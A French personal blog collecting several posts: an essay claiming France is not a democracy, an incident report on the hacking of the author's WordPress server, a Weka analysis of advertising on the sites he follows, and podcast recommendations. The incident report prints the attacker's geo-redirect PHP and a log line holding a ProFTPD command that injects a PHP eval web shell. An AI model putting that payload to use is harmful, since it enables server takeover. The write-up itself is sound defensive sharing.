La France n’est pas une démocratie

Nous ne sommes pas dans une démocratie. Certaines personnes, dont nos dirigeants, disent souvent que nous sommes dans une démocratie représentative. D’autres, moins aveugles, disent que nous sommes dans une république démocratique. Ce n’est pas faux d’un point de vue théorique, mais ce type de régime n’est pas une démocratie. Dans la pratique ce type de gouvernement est souvent soumis à des dérives oligarchiques.

Une démocratie nécessite que le peuple soit souverain. Pour la forme la plus légère de la démocratie (la démocratie représentative) cela nécessite quatre conditions sans lesquelles elle ne peut pas exister.

Avoir les caractéristiques d’une république démocratique

Une démocratie représentative doit posséder les caractéristiques d’une république démocratique. J’aime bien la définition qu’en donne l’internaute :
-République qui se caractérise notamment par un État de droit, un suffrage universel, une souveraineté nationale, mais aussi des partis politiques libres et des libertés publiques.

La France et la plupart des pays du Nord se disant être des démocraties présentent ces caractéristiques. À l’exception, peut être, des libertés publiques ou les doutes sont légitimes.

Des mandats impératifs

Un mandat impératif permet de confier une mission qui doit être menée. Prenons comme exemple le cas d’une élection présidentielle :
Différent candidats se présentent. Tous ont un programme politique. Celui qui sera élu se verra imposer son programme comme mission à mettre en œuvre pendant les X années de son mandat. Les ministres qu’il nomme ont bien entendu la même mission que lui.
En France, le programme avec lequel nos représentants se font élire ne présente pas cette contrainte. Ils sont libre de faire la politique qu’ils souhaitent après avoir été élu.

Le mandat impératif est nécessaire pour un contrôle a priori. Il permet au peuple non seulement de choisir son représentant, mais aussi d’avoir une influence sur la politique mise en œuvre.

Des référendums

À l’inverse de ce qui s’est passée récemment avec l’utilisation du 49-3 pour faire passer l’impopulaire loi travail. Si des citoyens manifestent une objection sur un projet de loi alors un référendum doit avoir lieu et l’avis du peuple doit être suivi.

Cela permet un contrôle continu sur les dérives potentielles du gouvernement élu.

La ciguë

Le titre de ce paragraphe est provocateur mais l’idée est là. Lorsque le mandat des membres du gouvernement arrive à leur fin les citoyens doivent être en mesure d’évaluer et de punir ces derniers si besoin. La peine de mort est probablement exagérée, mais une peine de prison est tout à fait adaptée. Le prix à payer pour la mauvaise gestion d’un pays peut être élevé et les responsables ne peuvent pas rester impuni.

C’est un contrôle à posteriori pour garantir le respect du mandat. Une invitation pour les fainéants, les coureurs de jupons et les détourneurs de fonds qui manquent de temps pour leur travail à trouver un job sans ce type de responsabilités.

Comment gérer une intrusion serveur sans expérience en sécurité ?

Le 30 avril j’ai eu à gérer une intrusion sur mon serveur. L’objectif de cet article est de partager cette mésaventure pour permettre à ceux qui se retrouveraient dans la même situation et qui ne possèdent aucune expérience en sécurité informatique (ce qui est mon cas) d’agir de façon correcte.
Comme d’habitude le retour et la critique seront appréciés 😉 .

Le réveil

Samedi 30 avril, après une phase de réveil, je regarde mes courriels. Le 29/04 à 22h20 j’ai reçu un courriel étrange de la part de Google Search Console Tools, sobrement intitulé « Nouveau propriétaire pour http://omnos.fr ». Ça fait peur. Ni une ni deux je me connecte à l’outil de Google et je constate effectivement l’ajout d’un propriétaire et d’une adresse : « http://omnos.cnruby.net ». Il est impossible d’ajouter un propriétaire sans l’ajout d’un fichier sur mon serveur donc je me connecte via SSH et je vais voir. Effectivement un fichier a été ajouté. Ce n’était pas le seul, mais je ne le savais pas encore.

Je décide d’investiguer de façon minutieuse avant de faire quoi que ce soit d’autre. L’auteur du piratage a eu plus de 10 heures devant lui. Par conséquent je n’avais aucune raison de me presser.
Je n’avais pas une idée très claire de ce que j’allais faire ensuite, mais au final mon action peut se résumer en quatre phases :
– Investiguer : comprendre comment l’attaque a eu lieu et sa portée (uniquement sur mon blog WordPress ? Sur les services web ? Sur tout mon serveur ? )
– Bloquer les accès utilisés depuis l’extérieur.
– Réparer les dégâts.
– Savoir si d’autres ont subi ce piratage et les prévenir.

Rétrospectivement je pense que c’est un bon schéma à appliquer, mais comme vous allez pouvoir le lire, la pratique était un peu plus brouillonne.

L’investigation

J’ai regardé les dates de modification des fichiers dans le dossier de WordPress et j’ai vu que les fichiers index.php et xmlrpc.php avaient été modifiés pour rajouter ceci :

1
2
3
4
5
6
7
8
include("/var/www/wordpress/wp-content/plugins/duplicator/classes/tabgeo_country_v4.php");
$ip = $_SERVER['REMOTE_ADDR'];
$country_code = tabgeo_country_v4($ip);
if ($country_code != 'FR') {
	header("HTTP/1.1 301 Moved Permanently");
	header("Location: http://omnos.cnruby.net/");
	exit();
}

Ce code utilise un plugin WordPress désactivé pour connaître l’origine de l’IP et applique une redirection vers un site (qui est une copie de la page d’accueil de mon blog) si l’IP n’est pas française. J’ai eu de la chance, j’aurais pu ne pas remarquer cette intrusion pendant des semaines. Je ne sais toujours pas à quoi cette modification peut lui servir concrètement donc si vous avez une idée signalez-la moi 😉 .
D’autres fichiers ont été rajoutés dans des sous-dossiers. Malheureusement je ne l’ai pas vu tout de suite, car, chose que je ne savais pas, la date de dernière modification d’un dossier ne correspond pas forcément à la date de la dernière modification ou du dernier ajout d’un fichier dans ce dossier.

À partir de ce moment j’ai décidé de demander de l’aide à des personnes plus compétentes. Je conseille à tous d’aller faire un tour sur le channel IRC ##security de freenode en cas de problème.

On a scanné les ports de mon serveur, donné des conseils et regardé si des failles connues existaient sur les différents logiciels installés sur mon serveur pendant que je regardais les logs (SSH, Apache, WordPress). Un peu après que l’un d’entre eux ait trouvé la faille utilisée (une faille de ProFTPD qui aurait dû être mis à jour depuis longtemps dans les paquets de ma distribution), j’ai trouvé, dans les logs de WordPress, des requêtes étranges spécifiques du moment de l’attaque:

1
ip.de.pc.zombi - - [29/Apr/2016:22:19:19 +0200] "POST /wp-admin/network/cacheplugin.php HTTP/1.1" 200 4550 "http://omnos.fr/wp-admin/network/cacheplugin.php" "Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0"

Après l’avoir annoncé sur le chan IRC l’un d’eux a répondu que l’attaquant avait utilisé mon installation WordPress cassée.

Je ne sais pas si c’est par manque de temps (il me restait une heure devant moi avant d’être absent) ou si j’espérais que le pirate ait exploité une faille WordPress plutôt que la faille ProFTPD qui a bien plus d’impact. J’ai choisi d’attribuer la faille exploitée à WordPress (ou à ma configuration de WordPress) et de passer au blocage du pirate. Je regarderai ce fichier cacheplugin.php plus tard.
Cette grave erreur m’a coûté une investigation plus poussée à faire à posteriori.

Le blocage

J’ai désinstallé ProFTPD. J’ai coupé l’accès du pirate mais j’ai perdu les logs (purge).
J’ai fait les mises à jour système (que j’effectue régulièrement). Les mises à jour ont modifié beaucoup de fichiers ce qui a rendu mon investigation avancée plus compliquée.
J’ai changé le mot de passe de la base de données utilisée par WordPress. C’était nécessaire.
J’ai fait un cp sur le dossier contenant le blog puis j’ai remplacé le contenu de l’original par un index.html annonçant le problème. J’aurais dû faire un mv pour ne pas changer les dates de dernière modification.

Je pars de chez moi.

L’investigation avancée

Entre-temps j’ai été contacté par Vassili qui a proposé son aide pour chercher d’autres sites piratés par la même personne.
De retour chez moi j’accepte son aide et je regarde le fichier cacheplugin.php situé dans wp-admin/network. Il me semble très étrange d’avoir un fichier WordPress comme cela, je télécharge donc une version propre et effectivement ce fichier n’est pas présent. Un autre du même dossier est spécifique à mon installation, le dénommé debugvr.php contenant :

1
proftpd: ip.de.pc.zombi:60100: SITE cpto /tmp/.< ?php eval($_REQUEST[cmd]); echo G00D;?>

Et voilà, je me rends compte que c’est la faille de ProFTPD qui a été utilisée. Ça change tout.
J’utilise find pour trouver tous les fichiers modifiés durant la période de l’attaque :

1
find / -mmin -1440 -mmin +1020 -print

Puis pour trouver tous les fichiers modifiés depuis (ils auraient pu être remodifiés par le système ou moi-même):

1
find / -mmin -1440 -print

Cela m’a pris beaucoup de temps et j’ai pu manquer des choses. N’ayant rien trouvé d’autre de suspect j’ai décidé de remettre le blog en ligne.

La remise en ligne

J’ai conservé la même base de données, changé le mot de passe de mon compte et récupéré une installation WordPress propre à laquelle j’ai ajouté les médias, puis réinstallé les extensions.

Que faire d’autre ?

C’était plutôt difficile et long, mais je suis content d’avoir eu de la chance dans ma malchance. La faille aurait pu permettre de faire bien pire.

Il me reste bien sûr à contacter les sites web trouvés par Vassili. Je compte également faire une réinstallation complète à moyen terme (j’ai peut-être loupé des choses). Si vous avez d’autres suggestions n’hésitez pas 😉

Et si la pub disparaissait du web ?

Une critique souvent faite aux personnes bloquant la publicité est qu’ils « tuent » des sites web et des projets. Il est indéniable qu’une partie du web disparaîtrait sans publicité, mais est-ce qu’ils tuent le web qu’ils utilisent quotidiennement ou uniquement celui sur lequel ils tombent malencontreusement ?
L’objectif de cet article est d’analyser les conséquences qu’aurait un web sans pub sur le petit morceau du web que je consulte régulièrement et de partager le protocole pour que vous puissiez également faire votre propre analyse.

Pour ce faire je vais utiliser les sites web contenu dans mon agrégateur de flux RSS. En effet ils représentent la majeure partie de ma consultation du web. Le reste est partagé entre quelques agrégateurs de liens tels que le journal du hacker et divers sites rencontrés via des moteurs de recherche. Analyser ces derniers est plus compliqué même si probablement possible avec l’historique.

Cet article n’a pas la prétention de donner des résultats généralisables. Avec vos données vous pouvez avoir d’autres résultats et des conclusions tout à fait différentes et je suis très curieux de les connaître, n’hésitez donc pas à me communiquer vos analyses 😉

Protocole

Pour chaque site suivi je suis allé sur le lien est j’ai cherché s’il y avait des publicités (les articles sponsorisés comptant comme de la pub), s’il y avait un financement participatif (dons, patreon, flattr…), s’il y avait de la promotion professionnelle (vente de services ou de biens). J’ai également cherché à savoir si le site web était personnel, associatif (association de fait) ou professionnelle. Si le contenu n’est pas auto-hébergé ou sur un serveur loué alors j’ai noté la plateforme/le service (Overblog par exemple). Le type de contenu est également pris en compte (texte, image, audio, vidéo) ainsi que sa nature (divertissement, partage de connaissance, opinion).

Pour les vidéos et l’audio lorsque qu’un service est utilisé alors seul la publicité dans le média est prise en compte, car on peut déterminer la volonté de l’auteur de cette façon. Avec Youtube le créateur choisit s’il y a de la publicité dans ses vidéos. Pour les podcasts audio, en général, c’est  de l’affiliation « artisanale », les présentateurs ayant enregistré les spots eux-mêmes et les ajoute directement dans le fichier audio.

Les diverses informations récoltées sur chaque site web va permettre d’avoir un aperçu des facteurs corrélés avec la publicité.

Les données et leur analyse

La première bonne surprise est que la publicité est présente dans uniquement 88 des médias sur les 223 analysés soit moins de 40% des médias présents.
Afin de pouvoir comprendre les données clairement j’ai utilisé Weka.

Weka permet de visualiser les données et d’appliquer des algorithmes de classification.

annoted

Screenshot annoté de la visualisation des données dans Weka. Le rouge représente la présence de publicité, le bleu son absence.

À partir d’une simple visualisation du jeu de données on peut déjà noter diverses corrélations intéressantes entre la publicité et :
– Lorsque le créateur cherche à vivre de sa création.
– Avec le divertissement.
– Les services web notamment wordpress.com et Youtube.

J’ai appliqué un algorithme de création d’arbre de décision sur mes données pour avoir une meilleure idée des facteurs discriminant. Le premier arbre est sur tous les attributs du screenshot :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
=== Run information ===
 
Scheme:weka.classifiers.trees.J48 -C 0.25 -M 2
Relation:     sitesall-weka.filters.unsupervised.attribute.Remove-R2
Instances:    223
Attributes:   8
              site_web
              financement_participatif
              promotion_professionnel
              publicite
              nature
              plateforme
              type
              objet
Test mode:evaluate on training data
 
=== Classifier model (full training set) ===
 
J48 pruned tree
------------------
 
plateforme = blogspot: non (13.0/1.0)
plateforme = cafe: non (7.0)
plateforme = canablog: oui (1.0)
plateforme = framasoft: non (4.0)
plateforme = free: non (2.0)
plateforme = github: non (1.0)
plateforme = lemonde.fr: oui (1.0)
plateforme = mediapart: oui (1.0)
plateforme = nipcast: non (1.0)
plateforme = non
|   nature = associatif: non (7.0)
|   nature = personnel: non (80.0/8.0)
|   nature = professionnel: oui (17.0/7.0)
plateforme = olympe.in: non (1.0)
plateforme = overblog
|   promotion_professionnel = non: oui (5.0/2.0)
|   promotion_professionnel = oui: non (3.0/1.0)
plateforme = podbean: non (2.0/1.0)
plateforme = podomatic: non (1.0)
plateforme = sciencepress: oui (4.0)
plateforme = soundcloud: non (1.0)
plateforme = tumblr: non (1.0)
plateforme = typepad: non (1.0)
plateforme = unblog.fr: oui (1.0)
plateforme = univlille: non (1.0)
plateforme = univpoitier: non (1.0)
plateforme = wordpress.com: oui (18.0)
plateforme = youtube: oui (48.0/10.0)
 
Number of Leaves  : 	26
 
Size of the tree : 	29
 
 
Time taken to build model: 0.02 seconds
 
=== Evaluation on training set ===
=== Summary ===
 
Correctly Classified Instances         193               86.5471 %
Incorrectly Classified Instances        30               13.4529 %
Kappa statistic                          0.7228
Mean absolute error                      0.202 
Root mean squared error                  0.3178
Relative absolute error                 42.2625 %
Root relative squared error             65.023  %
Total Number of Instances              223     
 
=== Detailed Accuracy By Class ===
 
               TP Rate   FP Rate   Precision   Recall  F-Measure   ROC Area  Class
                 0.859     0.125      0.913     0.859     0.885      0.917    non
                 0.875     0.141      0.802     0.875     0.837      0.917    oui
Weighted Avg.    0.865     0.131      0.869     0.865     0.866      0.917

La plateforme est très déterminante pour l’existence de la publicité, cela se comprend très bien via le « business model » de ces services. Vous avez le choix entre gratuit avec de la pub ou payant et sans pub et pouvez changer à tout moment. On peut également observer que sans plateforme 86 sites sur 104 n’ont pas de pubs (plus de 80%) et pour ces derniers la publicité est plus présente sur les sites à objectif professionnel.
Le second arbre porte sur tous les attributs sauf « categorie » qui représente uniquement un nom attribué dans mes flux et les « plateforme » :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
=== Run information ===
 
Scheme:weka.classifiers.trees.J48 -C 0.25 -M 2
Relation:     sitesall-weka.filters.unsupervised.attribute.Remove-R2-weka.filters.unsupervised.attribute.Remove-R6-weka.filters.unsupervised.attribute.Remove-R1
Instances:    223
Attributes:   6
              financement_participatif
              promotion_professionnel
              publicite
              nature
              type
              objet
Test mode:evaluate on training data
 
=== Classifier model (full training set) ===
 
J48 pruned tree
------------------
 
type = audio: non (31.0/4.0)
type = image
|   nature = associatif: non (1.0)
|   nature = personnel: non (20.0/3.0)
|   nature = professionnel: oui (4.0/1.0)
type = texte
|   nature = associatif: non (8.0)
|   nature = personnel: non (98.0/34.0)
|   nature = professionnel
|   |   financement_participatif = non
|   |   |   objet = connaissance: non (5.0/1.0)
|   |   |   objet = divertissement: oui (5.0)
|   |   |   objet = opinion: oui (0.0)
|   |   financement_participatif = oui: non (3.0)
type = video: oui (48.0/10.0)
 
Number of Leaves  : 	11
 
Size of the tree : 	16
 
 
Time taken to build model: 0 seconds
 
=== Evaluation on training set ===
=== Summary ===
 
Correctly Classified Instances         170               76.2332 %
Incorrectly Classified Instances        53               23.7668 %
Kappa statistic                          0.4701
Mean absolute error                      0.3382
Root mean squared error                  0.4112
Relative absolute error                 70.7463 %
Root relative squared error             84.128  %
Total Number of Instances              223     
 
=== Detailed Accuracy By Class ===
 
               TP Rate   FP Rate   Precision   Recall  F-Measure   ROC Area  Class
                 0.919     0.477      0.747     0.919     0.824      0.793    non
                 0.523     0.081      0.807     0.523     0.634      0.793    oui
Weighted Avg.    0.762     0.321      0.771     0.762     0.749      0.793

Sur ce second arbre on peut observer que le facteur le plus discriminant, si on exclue la plateforme, est le média utilisé. Cependant, la vidéo représente uniquement Youtube. Ensuite, vient la nature de l’entité derrière le site : les professionnels mettent plus de pubs que les individus, qui en mettent plus que les associations.

Quel impact si la pub disparaît ?

Le pire des cas

Le pire scénario envisagé est :
– Tout le contenu avec de la publicité disparaît.
– Toutes les vidéos disparaissent. La vidéo demande plus de ressources serveur que les autres médias.
– Tout l’audio hébergé sur une plate-forme (podbean, podomatic, soundcloud) disparaît. L’audio coûtant légèrement plus cher que du texte ou des images, ce coût pourrait ne pas être absorbé par les créateurs.

Dans ce cas il reste 120 sites web sur 223 soit plus de 50% du nombre initial.

Le cas réaliste

Trouver un scénario réaliste est très difficile, j’ai donc arbitrairement choisit que :
– Tout média sans pub reste disponible (sauf pour les chaînes Youtube).
– La moité des chaînes Youtube sans pub reste disponible.
– La moitié des médias avec pub, mais avec un financement complémentaire restent en ligne.

On a donc 125 + 10/2 + 48/2 = 154 sites toujours actifs soit ~ 70% du nombre initial.

Le cas optimiste

Dans le meilleur des mondes :
– Tout média sans pub reste disponible.
– Tout média avec pub et un financement complémentaire reste en ligne.

Soit 135 + 48 = 183 sites en lignes ce qui représente plus de 80 % de jeu de données.

Et s’il ne reste plus que la moitié du web ?

Parmi mes consultations sur le web seules 40% se font sur des sites avec de la publicité. Avec un bloqueur de pub je nuis à leur revenu, si tout le monde fait pareil alors dans le pire des cas 50% du petit morceau de web sur lequel je navigue va disparaître.
Quel impact cette disparition aurait pour moi ?
Bien sûr tous ces sites sont de qualité et m’apportent quelque chose. Cependant, le contenu de la plupart de ces médias est également ailleurs sur le web, sous une autre forme, avec des explications/des blagues peut être moins bonnes, mais tout de même présent. L’impact le plus important serait sur quelques sites de niches sans équivalent, mais ceci abordent des sujets que je suis plus par curiosité qu’autre chose.

De plus, c’est à mettre en perspective avec ce que je qualifiais « d’effet Facebook ». J’ai l’impression que depuis l’arrivée de certains réseaux sociaux d’anciennes communautés existantes autour de sujets de niche ont migré des blogs et forums vers les réseaux sociaux pour totalement disparaître du web public. Qu’est-ce que 50% de disparitions de sites web pour une forme de qualité permettant de se concentrer sur le contenu sans être dérangé par le dernier slogan d’une marque quelconque face à la migration de communautés entières dans un environnement fermé ?Et si, sans publicité, Facebook&Co meurent et ces communautés sont de retour sur le web ?

Des écrans rouges pour mieux dormir

Me couchant souvent tard avec l’ordinateur allumé j’ai un peu de mal à m’endormir. Ceci est dû à la lumière de l’écran qui diminue la production de mélatonines. Bien sûr l’idéal c’est de ne pas utiliser un écran le soir.

Pour ceux qui n’ont pas le choix il faut évidemment diminuer la luminosité des écrans au minimum. Cependant, souvent ce n’est pas suffisant et vous aurez quand même du mal à trouver le sommeil. Des chercheurs ont trouvé que la lumière bleu perturbe plus le sommeil que les autres lumières et il a fallu peu de temps au développeurs pour tirer parti de cette information.
Plusieurs logiciels ont été créées pour assombrir et rajouter un voile rouge par-dessus votre écran.

Il existe Redshift pour les ordinateurs (malheureusement sur les écrans non IPS en fonction de l’angle on peut avoir une forte impression de dégradé) et RedMoon pour Android.

Présentation de quelques podcasts audio

Si vous souhaitez écoutez quelques podcasts audio voici la liste des balados que j’écoute classés par thème.

Science

Anthropodcast constitué d’épisodes plutôt court (de 20 à 30 min) à propos d’anthropologie et dans une moindre mesure de voyages.
Lisez la science qui dure un peu plus d’une heure et qui parle d’un livre de vulgarisation avec un invité
Timeline une émission présentant divers sujets historiques, très bien conduite et très agréable à écouter. Probablement l’un des meilleurs podcasts francophones sur la forme et le fond et l’un de ceux par lesquels je conseillerais de commencer.
Podcast Science l’un des plus vieux podcast francophone qui s’est bonifié avec le temps. Le format principal actuel consiste en dossier sur un sujet scientifique séparé en deux épisodes d’une heure trente à deux heures. Les dossiers passent de plus en plus souvent un peer review léger qui permet d’éviter des erreurs et qui en fait l’un des meilleurs podcasts de vulgarisation scientifique. C’est également un très bon podcast par lequel commencer.

Informatique

Vie artificielle entre vulgarisation scientifique et informatique ce podcast aborde divers sujets lié à la vie artificielle et l’intelligence artificielle.
NoLimitSecu qui offre deux types d’épisodes. Une partie des épisodes sont des retours sur des conférences et événements concernant la sécurité informatique et sont probablement utiles pour des personnes travaillant dans ce domaine. L’autre partie présente des concepts en sécurité informatique et se révèle intéressante pour toute personne travaillant dans l’informatique.
NipDev un podcast sur le développement informatique et des concepts qui peuvent être utiles pour certains projets.
L’Echo des Gnous podcast sur l’informatique libre orienté grand publique avec deux types d’émissions. La face A présentant des actualités du monde du logiciel libre et la face B contient des discutions sur des sujets liés au libre.

Zététique/Scepticisme

Rationally Speaking podcast anglophone de très bonne qualité sur divers sujets concernant le scepticisme.
Scepticisme Scientifique plus vieux podcast francophone sur le scepticisme et la zététique avec plus de 300 épisodes au compteur. La qualité sonore n’est pas toujours au rendez-vous, mais le fond est souvent très intéressant.
Le Monde Merveilleux du Scepticisme contrairement aux autres podcasts sceptiques présentés celui-ci introduit dans certains épisodes des retours d’expérimentations sur le terrain. Il y a généralement plusieurs sujets qui sont abordés au court d’un épisode.

Opinion

The Phileas club podcast anglophone regroupant plusieurs personnes de part le monde discutant de comment un événement ou un sujet de dimension international est vu à travers le monde.
Radio Reflets podcast du journal Reflets.info abordant souvent des sujets liés à la dérive sécuritaire.

Divers

From the perch podcast anglophone sur l’aviculture et les oiseaux de compagnie. Très partial contrairement à leur slogan « Prepart to enter where news, facts and strong opinions collide ». Podcast essentiel si vous avez des oiseaux. Il faut cependant toujours garder un esprit très critique sur tout ce qui y ait dit.
Monnaie libre podcast sur les monnaies libres et l’économie. L’épisode type consiste en une discution avec l’invité sur comment et pourquoi il s’est intéressé aux monnaies libre ce qui rend le podcast plutôt répétitif. Il existe cependant des épisodes plus riches qui permettent d’aborder le sujet de la création monétaire et de son possible impact sur l’économie.
Le Wapx unique en son genre c’est un podcast audio sur des musiques, des remix bizarres, des reprises magiques, des sons étranges, des pingouins. À écouter au moins une fois.
Radiolab podcast anglophone interviewant des personnes ayant vécu des événements liés à un problème sous-jacent plus général. La forme est de très bonne qualité, mais le fond fait un peu voyeur. La plupart des épisodes restent agréables à écouter.